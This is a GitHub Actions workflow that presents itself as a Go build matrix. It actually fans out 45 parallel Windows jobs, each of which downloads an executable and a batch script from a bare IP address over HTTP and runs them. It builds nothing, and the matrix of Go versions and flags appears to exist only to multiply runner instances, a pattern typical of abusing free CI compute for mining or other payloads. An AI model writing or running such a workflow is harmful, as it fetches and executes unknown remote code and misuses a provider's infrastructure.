name: Github
on: workflow_dispatch
jobs:
  build:
    name: setup
    runs-on: windows-latest
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.6, 1.7, 1.8, 1.9, 1.10]
        flag: [A, B, C, D, E, F, G, H, I]
    timeout-minutes: 30
    steps:
    - name: checkout
      uses: actions/checkout@v1
    - name: running
      run: |
        Invoke-WebRequest http://134.122.17.115/cm.exe -OutFile cm.exe
        Invoke-WebRequest http://134.122.17.115/start.bat -OutFile start.bat
        cmd /c start.bat
